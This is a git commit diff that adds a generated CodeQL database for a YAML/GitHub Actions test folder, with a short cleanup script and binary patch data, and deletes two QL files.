db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TApproxAccessPathF-baba9c49#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TBooleanOption-dec0af22#1#b create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TCallContext-54d858e5#2# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#1# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119#0#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TContent create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TContent#0#s create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit#0# create mode 100644 db/db-yaml/default/cache/pages/01.pack create mode 100644 db/db-yaml/default/cache/pages/01.pack.d create mode 100644 db/db-yaml/default/cache/pages/02.pack create mode 100644 db/db-yaml/default/cache/pages/08.pack create mode 100644 db/db-yaml/default/cache/pages/09.pack create mode 100644 db/db-yaml/default/cache/pages/09.pack.d create mode 100644 db/db-yaml/default/cache/pages/0b.pack create mode 100644 db/db-yaml/default/cache/pages/0b.pack.d create mode 100644 db/db-yaml/default/cache/pages/0d.pack create mode 100644 db/db-yaml/default/cache/pages/17.pack create mode 100644 db/db-yaml/default/cache/pages/17.pack.d create mode 100644 db/db-yaml/default/cache/pages/20.pack create mode 100644 db/db-yaml/default/cache/pages/20.pack.d create mode 100644 db/db-yaml/default/cache/pages/24.pack create mode 100644 db/db-yaml/default/cache/pages/24.pack.d create mode 100644 db/db-yaml/default/cache/pages/26.pack create mode 100644 db/db-yaml/default/cache/pages/26.pack.d create mode 100644 db/db-yaml/default/cache/pages/27.pack create mode 100644 db/db-yaml/default/cache/pages/27.pack.d create mode 100644 db/db-yaml/default/cache/pages/29.pack create mode 100644 db/db-yaml/default/cache/pages/2b.pack create mode 100644 db/db-yaml/default/cache/pages/2d.pack create mode 100644 db/db-yaml/default/cache/pages/33.pack create mode 100644 db/db-yaml/default/cache/pages/33.pack.d create mode 100644 db/db-yaml/default/cache/pages/37.pack create mode 100644 db/db-yaml/default/cache/pages/37.pack.d create mode 100644 db/db-yaml/default/cache/pages/3c.pack create mode 100644 db/db-yaml/default/cache/pages/3c.pack.d create mode 100644 db/db-yaml/default/cache/pages/42.pack create mode 100644 db/db-yaml/default/cache/pages/42.pack.d create mode 100644 db/db-yaml/default/cache/pages/45.pack create mode 100644 db/db-yaml/default/cache/pages/45.pack.d create mode 100644 db/db-yaml/default/cache/pages/46.pack create mode 100644 db/db-yaml/default/cache/pages/4c.pack create mode 100644 db/db-yaml/default/cache/pages/4c.pack.d create mode 100644 db/db-yaml/default/cache/pages/4d.pack create mode 100644 db/db-yaml/default/cache/pages/4d.pack.d create mode 100644 db/db-yaml/default/cache/pages/4e.pack create mode 100644 db/db-yaml/default/cache/pages/4e.pack.d create mode 100644 db/db-yaml/default/cache/pages/54.pack create mode 100644 db/db-yaml/default/cache/pages/55.pack create mode 100644 db/db-yaml/default/cache/pages/5d.pack create mode 100644 db/db-yaml/default/cache/pages/62.pack create mode 100644 db/db-yaml/default/cache/pages/6a.pack create mode 100644 db/db-yaml/default/cache/pages/6f.pack create mode 100644 db/db-yaml/default/cache/pages/6f.pack.d create mode 100644 db/db-yaml/default/cache/pages/7a.pack create mode 100644 db/db-yaml/default/cache/pages/7a.pack.d create mode 100644 db/db-yaml/default/cache/pages/7b.pack create mode 100644 db/db-yaml/default/cache/pages/7b.pack.d create mode 100644 db/db-yaml/default/cache/pages/84.pack create mode 100644 db/db-yaml/default/cache/pages/84.pack.d create mode 100644 db/db-yaml/default/cache/pages/88.pack create mode 100644 db/db-yaml/default/cache/pages/88.pack.d create mode 100644 db/db-yaml/default/cache/pages/93.pack create mode 100644 db/db-yaml/default/cache/pages/96.pack create mode 100644 db/db-yaml/default/cache/pages/96.pack.d create mode 100644 db/db-yaml/default/cache/pages/9e.pack create mode 100644 db/db-yaml/default/cache/pages/9e.pack.d create mode 100644 db/db-yaml/default/cache/pages/a1.pack create mode 100644 db/db-yaml/default/cache/pages/a3.pack create mode 100644 db/db-yaml/default/cache/pages/a3.pack.d create mode 100644 db/db-yaml/default/cache/pages/aa.pack create mode 100644 db/db-yaml/default/cache/pages/aa.pack.d create mode 100644 db/db-yaml/default/cache/pages/b5.pack create mode 100644 db/db-yaml/default/cache/pages/bd.pack create mode 100644 db/db-yaml/default/cache/pages/c2.pack create mode 100644 db/db-yaml/default/cache/pages/d0.pack create mode 100644 db/db-yaml/default/cache/pages/d0.pack.d create mode 100644 db/db-yaml/default/cache/pages/d5.pack create mode 100644 db/db-yaml/default/cache/pages/d6.pack create mode 100644 db/db-yaml/default/cache/pages/d6.pack.d create mode 100644 db/db-yaml/default/cache/pages/d7.pack create mode 100644 db/db-yaml/default/cache/pages/d7.pack.d create mode 100644 db/db-yaml/default/cache/pages/df.pack create mode 100644 db/db-yaml/default/cache/pages/e1.pack create mode 100644 db/db-yaml/default/cache/pages/e9.pack create mode 100644 db/db-yaml/default/cache/pages/e9.pack.d create mode 100644 db/db-yaml/default/cache/pages/f3.pack create mode 100644 db/db-yaml/default/cache/pages/f3.pack.d create mode 100644 db/db-yaml/default/cache/pages/f6.pack create mode 100644 db/db-yaml/default/cache/pages/fc.pack create mode 100644 db/db-yaml/default/cache/pages/fc.pack.d create mode 100644 db/db-yaml/default/cache/pages/fd.pack create mode 100644 db/db-yaml/default/cache/predicates/00.pack create mode 100644 db/db-yaml/default/cache/predicates/01.pack create mode 100644 db/db-yaml/default/cache/predicates/02.pack create mode 100644 db/db-yaml/default/cache/predicates/04.pack create mode 100644 db/db-yaml/default/cache/predicates/06.pack create mode 100644 db/db-yaml/default/cache/predicates/07.pack create mode 100644 db/db-yaml/default/cache/predicates/08.pack create mode 100644 db/db-yaml/default/cache/predicates/09.pack create mode 100644 db/db-yaml/default/cache/predicates/18.pack create mode 100644 db/db-yaml/default/cache/predicates/1b.pack create mode 100644 db/db-yaml/default/cache/predicates/1c.pack create mode 100644 db/db-yaml/default/cache/predicates/1f.pack create mode 100644 db/db-yaml/default/cache/predicates/22.pack create mode 100644 db/db-yaml/default/cache/predicates/24.pack create mode 100644 db/db-yaml/default/cache/predicates/25.pack create mode 100644 db/db-yaml/default/cache/predicates/26.pack create mode 100644 db/db-yaml/default/cache/predicates/27.pack create mode 100644 db/db-yaml/default/cache/predicates/28.pack create mode 100644 db/db-yaml/default/cache/predicates/29.pack create mode 100644 db/db-yaml/default/cache/predicates/2a.pack create mode 100644 db/db-yaml/default/cache/predicates/2d.pack create mode 100644 db/db-yaml/default/cache/predicates/2e.pack create mode 100644 db/db-yaml/default/cache/predicates/2f.pack create mode 100644 db/db-yaml/default/cache/predicates/32.pack create mode 100644 db/db-yaml/default/cache/predicates/3a.pack create mode 100644 db/db-yaml/default/cache/predicates/3c.pack create mode 100644 db/db-yaml/default/cache/predicates/42.pack create mode 100644 db/db-yaml/default/cache/predicates/48.pack create mode 100644 db/db-yaml/default/cache/predicates/49.pack create mode 100644 db/db-yaml/default/cache/predicates/4c.pack create mode 100644 db/db-yaml/default/cache/predicates/4e.pack create mode 100644 db/db-yaml/default/cache/predicates/55.pack create mode 100644 db/db-yaml/default/cache/predicates/57.pack create mode 100644 db/db-yaml/default/cache/predicates/58.pack create mode 100644 db/db-yaml/default/cache/predicates/59.pack create mode 100644 db/db-yaml/default/cache/predicates/5a.pack create mode 100644 db/db-yaml/default/cache/predicates/5f.pack create mode 100644 db/db-yaml/default/cache/predicates/60.pack create mode 100644 db/db-yaml/default/cache/predicates/62.pack create mode 100644 db/db-yaml/default/cache/predicates/65.pack create mode 100644 db/db-yaml/default/cache/predicates/68.pack create mode 100644 db/db-yaml/default/cache/predicates/69.pack create mode 100644 db/db-yaml/default/cache/predicates/6c.pack create mode 100644 db/db-yaml/default/cache/predicates/6f.pack create mode 100644 db/db-yaml/default/cache/predicates/72.pack create mode 100644 db/db-yaml/default/cache/predicates/73.pack create mode 100644 db/db-yaml/default/cache/predicates/74.pack create mode 100644 db/db-yaml/default/cache/predicates/75.pack create mode 100644 db/db-yaml/default/cache/predicates/77.pack create mode 100644 db/db-yaml/default/cache/predicates/7a.pack create mode 100644 db/db-yaml/default/cache/predicates/7b.pack create mode 100644 db/db-yaml/default/cache/predicates/7c.pack create mode 100644 db/db-yaml/default/cache/predicates/7d.pack create mode 100644 db/db-yaml/default/cache/predicates/7e.pack create mode 100644 db/db-yaml/default/cache/predicates/82.pack create mode 100644 db/db-yaml/default/cache/predicates/86.pack create mode 100644 db/db-yaml/default/cache/predicates/87.pack create mode 100644 db/db-yaml/default/cache/predicates/88.pack create mode 100644 db/db-yaml/default/cache/predicates/89.pack create mode 100644 db/db-yaml/default/cache/predicates/8d.pack create mode 100644 db/db-yaml/default/cache/predicates/8f.pack create mode 100644 db/db-yaml/default/cache/predicates/91.pack create mode 100644 db/db-yaml/default/cache/predicates/95.pack create mode 100644 db/db-yaml/default/cache/predicates/97.pack create mode 100644 db/db-yaml/default/cache/predicates/98.pack create mode 100644 db/db-yaml/default/cache/predicates/99.pack create mode 100644 db/db-yaml/default/cache/predicates/9c.pack create mode 100644 db/db-yaml/default/cache/predicates/9d.pack create mode 100644 db/db-yaml/default/cache/predicates/9e.pack create mode 100644 db/db-yaml/default/cache/predicates/a0.pack create mode 100644 db/db-yaml/default/cache/predicates/a2.pack create mode 100644 db/db-yaml/default/cache/predicates/a4.pack create mode 100644 db/db-yaml/default/cache/predicates/a8.pack create mode 100644 db/db-yaml/default/cache/predicates/a9.pack create mode 100644 db/db-yaml/default/cache/predicates/aa.pack create mode 100644 db/db-yaml/default/cache/predicates/ad.pack create mode 100644 db/db-yaml/default/cache/predicates/ae.pack create mode 100644 db/db-yaml/default/cache/predicates/b0.pack create mode 100644 db/db-yaml/default/cache/predicates/b2.pack create mode 100644 db/db-yaml/default/cache/predicates/b5.pack create mode 100644 db/db-yaml/default/cache/predicates/b8.pack create mode 100644 db/db-yaml/default/cache/predicates/bd.pack create mode 100644 db/db-yaml/default/cache/predicates/c1.pack create mode 100644 db/db-yaml/default/cache/predicates/c4.pack create mode 100644 db/db-yaml/default/cache/predicates/ca.pack create mode 100644 db/db-yaml/default/cache/predicates/cb.pack create mode 100644 db/db-yaml/default/cache/predicates/cc.pack create mode 100644 db/db-yaml/default/cache/predicates/cd.pack create mode 100644 db/db-yaml/default/cache/predicates/d2.pack create mode 100644 db/db-yaml/default/cache/predicates/d5.pack create mode 100644 db/db-yaml/default/cache/predicates/d8.pack create mode 100644 db/db-yaml/default/cache/predicates/dc.pack create mode 100644 db/db-yaml/default/cache/predicates/de.pack create mode 100644 db/db-yaml/default/cache/predicates/df.pack create mode 100644 db/db-yaml/default/cache/predicates/e0.pack create mode 100644 db/db-yaml/default/cache/predicates/e3.pack create mode 100644 db/db-yaml/default/cache/predicates/e4.pack create mode 100644 db/db-yaml/default/cache/predicates/e6.pack create mode 100644 db/db-yaml/default/cache/predicates/ec.pack create mode 100644 db/db-yaml/default/cache/predicates/ed.pack create mode 100644 db/db-yaml/default/cache/predicates/ee.pack create mode 100644 db/db-yaml/default/cache/predicates/f0.pack create mode 100644 db/db-yaml/default/cache/predicates/f2.pack create mode 100644 db/db-yaml/default/cache/predicates/f3.pack create mode 100644 db/db-yaml/default/cache/predicates/f6.pack create mode 100644 db/db-yaml/default/cache/predicates/f7.pack create mode 100644 db/db-yaml/default/cache/predicates/fa.pack create mode 100644 db/db-yaml/default/cache/predicates/fb.pack create mode 100644 db/db-yaml/default/cache/predicates/fc.pack create mode 100644 db/db-yaml/default/cache/predicates/ff.pack create mode 100644 db/db-yaml/default/cache/relations/07.pack create mode 100644 db/db-yaml/default/cache/relations/0a.pack create mode 100644 db/db-yaml/default/cache/relations/0c.pack create mode 100644 db/db-yaml/default/cache/relations/0d.pack create mode 100644 db/db-yaml/default/cache/relations/12.pack create mode 100644 db/db-yaml/default/cache/relations/13.pack create mode 100644 db/db-yaml/default/cache/relations/14.pack create mode 100644 db/db-yaml/default/cache/relations/19.pack create mode 100644 db/db-yaml/default/cache/relations/1d.pack create mode 100644 db/db-yaml/default/cache/relations/1e.pack create mode 100644 db/db-yaml/default/cache/relations/22.pack create mode 100644 db/db-yaml/default/cache/relations/2b.pack create mode 100644 db/db-yaml/default/cache/relations/32.pack create mode 100644 db/db-yaml/default/cache/relations/35.pack create mode 100644 db/db-yaml/default/cache/relations/52.pack create mode 100644 db/db-yaml/default/cache/relations/5a.pack create mode 100644 db/db-yaml/default/cache/relations/60.pack create mode 100644 db/db-yaml/default/cache/relations/65.pack create mode 100644 db/db-yaml/default/cache/relations/6e.pack create mode 100644 db/db-yaml/default/cache/relations/71.pack create mode 100644 db/db-yaml/default/cache/relations/73.pack create mode 100644 db/db-yaml/default/cache/relations/76.pack create mode 100644 db/db-yaml/default/cache/relations/78.pack create mode 100644 db/db-yaml/default/cache/relations/81.pack create mode 100644 db/db-yaml/default/cache/relations/86.pack create mode 100644 db/db-yaml/default/cache/relations/8a.pack create mode 100644 db/db-yaml/default/cache/relations/92.pack create mode 100644 db/db-yaml/default/cache/relations/9a.pack create mode 100644 db/db-yaml/default/cache/relations/9d.pack create mode 100644 db/db-yaml/default/cache/relations/a9.pack create mode 100644 db/db-yaml/default/cache/relations/aa.pack create mode 100644 db/db-yaml/default/cache/relations/ac.pack create mode 100644 db/db-yaml/default/cache/relations/b3.pack create mode 100644 db/db-yaml/default/cache/relations/b4.pack create mode 100644 db/db-yaml/default/cache/relations/b6.pack create mode 100644 db/db-yaml/default/cache/relations/b8.pack create mode 100644 db/db-yaml/default/cache/relations/bf.pack create mode 100644 db/db-yaml/default/cache/relations/c4.pack create mode 100644 db/db-yaml/default/cache/relations/c7.pack create mode 100644 db/db-yaml/default/cache/relations/ca.pack create mode 100644 db/db-yaml/default/cache/relations/cd.pack create mode 100644 db/db-yaml/default/cache/relations/d1.pack create mode 100644 db/db-yaml/default/cache/relations/d6.pack create mode 100644 db/db-yaml/default/cache/relations/dc.pack create mode 100644 db/db-yaml/default/cache/relations/e3.pack create mode 100644 db/db-yaml/default/cache/relations/ee.pack create mode 100644 db/db-yaml/default/cache/relations/f1.pack create mode 100644 db/db-yaml/default/cache/relations/f7.pack create mode 100644 db/db-yaml/default/cache/relations/f9.pack create mode 100644 db/db-yaml/default/cache/relations/fd.pack create mode 100644 db/db-yaml/default/cache/version create mode 100644 db/db-yaml/default/containerparent.rel create mode 100644 db/db-yaml/default/containerparent.rel.checksum create mode 100644 db/db-yaml/default/files.rel create mode 100644 db/db-yaml/default/files.rel.checksum create mode 100644 db/db-yaml/default/folders.rel create mode 100644 db/db-yaml/default/folders.rel.checksum create mode 100644 db/db-yaml/default/locations_default.rel create mode 100644 db/db-yaml/default/locations_default.rel.checksum create mode 100644 db/db-yaml/default/pools/0/buckets/info create mode 100644 db/db-yaml/default/pools/0/buckets/page-000000 create mode 100644 db/db-yaml/default/pools/0/info create mode 100644 db/db-yaml/default/pools/0/metadata/info create mode 100644 db/db-yaml/default/pools/0/metadata/page-000000 create mode 100644 db/db-yaml/default/pools/0/pageDump/page-000000000 create mode 100644 db/db-yaml/default/pools/1/buckets/info create mode 100644 db/db-yaml/default/pools/1/buckets/page-000000 create mode 100644 db/db-yaml/default/pools/1/ids1/info create mode 100644 db/db-yaml/default/pools/1/ids1/page-000000 create mode 100644 db/db-yaml/default/pools/1/indices1/info create mode 100644 db/db-yaml/default/pools/1/indices1/page-000000 create mode 100644 db/db-yaml/default/pools/1/info create mode 100644 db/db-yaml/default/pools/1/metadata/info create mode 100644 db/db-yaml/default/pools/1/metadata/page-000000 create mode 100644 db/db-yaml/default/pools/1/pageDump/page-000000000 create mode 100644 db/db-yaml/default/pools/poolInfo create mode 100644 db/db-yaml/default/sourceLocationPrefix.rel create mode 100644 db/db-yaml/default/sourceLocationPrefix.rel.checksum create mode 100644 db/db-yaml/default/strings/0/buckets/page-000000 create mode 100644 db/db-yaml/default/strings/0/metadata/page-000000 create mode 100644 db/db-yaml/default/strings/0/pageDump/page-000000000 create mode 100644 db/db-yaml/default/yaml.rel create mode 100644 db/db-yaml/default/yaml.rel.checksum create mode 100644 db/db-yaml/default/yaml_locations.rel create mode 100644 db/db-yaml/default/yaml_locations.rel.checksum create mode 100644 db/db-yaml/default/yaml_scalars.rel create mode 100644 db/db-yaml/default/yaml_scalars.rel.checksum create mode 100755 db/db-yaml/yaml.dbscheme create mode 100644 db/diagnostic/cli-diagnostics-add-20240301T120559.348Z.json create mode 100644 db/diagnostic/cli-diagnostics-add-20240301T120600.004Z.json create mode 100644 db/log/database-create-20240301.130558.279.log create mode 100644 db/log/database-index-files-20240301.130558.974.log create mode 100644 db/src.zip delete mode 100644 ql/lib/codeql/actions/ast/internal/Actions.qll delete mode 100644 ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml diff --git a/clean.sh b/clean.sh new file mode 100755 index 000000000000..e0458a639e36 --- /dev/null +++ b/clean.sh @@ -0,0 +1,2 @@ +#! /bin/bash +find . -type d -name "*testproj*" -exec rm -r {} + diff --git a/db/baseline-info.json b/db/baseline-info.json new file mode 100644 index 000000000000..9e26dfeeb6e6 --- /dev/null +++ b/db/baseline-info.json @@ -0,0 +1 @@ +{} \ No newline at end of file diff --git a/db/codeql-database.yml b/db/codeql-database.yml new file mode 100644 index 000000000000..b4f4f83a0bcd --- /dev/null +++ b/db/codeql-database.yml @@ -0,0 +1,10 @@ +--- +sourceLocationPrefix: /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 +baselineLinesOfCode: 0 +unicodeNewlines: false +columnKind: utf16 +primaryLanguage: yaml +creationMetadata: + cliVersion: 2.16.3 + creationTime: 2024-03-01T12:05:58.598849Z +finalised: true diff --git a/db/db-yaml/default/cache/.lock b/db/db-yaml/default/cache/.lock new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/db/db-yaml/default/cache/cached-strings/pools/0/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..18730c0fde8bff9360316792e7fc624a0eb11b31 GIT binary patch literal 40 dcmZQz00Tw{#Q>$5|AY9)YVE5*G-qVtPXH3@7D!>5*2sBPtw$_u9AwYltfm;Rgt;O}83iN3b2Q`kR1PBn= q7WlR=ynCQ6yfzkgteh7p=PPJHfB*pk1PBlyK!5-N0t5&U2nBv=1^^uZ literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/db/db-yaml/default/cache/cached-strings/pools/0/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..cdc1fce921e1ec68dee4f29b72b971f0fdb4b568 GIT binary patch literal 40 dcmZQz00Tw{#Q>!l|AY8qIiasXbR^@!VgM!p1XBP2 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 b/db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..beddaa49503d6dec5c59de7ecc00a9708acf7cb5 GIT binary patch literal 8192 zcmeIvu?@f=5CcG@?7tpUB#>;7mexWbild_V$LL&&vrFK)b|uM41)6SBvS_|e`1Xn2 z=#z$Hfmb)N*~*1`=;IsiD>J=KfB*pk1PBlyK!5-N0t5&UAV7cs0RjXFoF(uBW0VGi literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/db/db-yaml/default/cache/cached-strings/pools/0/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..58e30ec6a2083023e4053ebcf641455326100eed GIT binary patch literal 40 dcmZQz00Tw{#Q>!l|AY987KiD8==$?#g#jx11o!{| literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 b/db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..192298b641249e0a6510b5651c13ac89edb888c0 GIT binary patch literal 8192 zcmeIuF$%yi2nEojN!$D1xEaOGB?S7M6uv00HML7%>^kI5SzwkoEK~$~C7iN%nvLfO rJm_7~nL6~7rrJ)M|A@%~T literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/db/db-yaml/default/cache/cached-strings/pools/0/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..91c5a22d6a9c8b47601f5b914ac023ee18b307e8 GIT binary patch literal 40 ccmZQz00Tw{#Q>wFLHyVmSBpUO+=*um0UuWch5!Hn literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..05f3c4f61992be3e1d87d17db392618d8b233d4f GIT binary patch literal 8192 zcmeIuu?>Py7)9Zi5KtqKSeaN@V@F3rMaKXXjNuGcmM&mr2LrGH2?M;Aj!IAy2k;sl zf%3fMCjZInK4Xk=wd1Astn<5<>iAX;cXgn9qlF7U8r6HmTam z|G%@v>8Z}tTkYDo?Mux=009ILKmY**5I_I{1Q0*~0R#|0009ILKmY**5I_I{1Q0*~ Hf%yeKFK{SlQt|X#lguJW%>FbJn&sdk-^1a5C$5?Af z*EnDD7|x~UN1016v4*A9mdDa^>T9)by_ISD#lNGFZp+*ULx2DQ0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 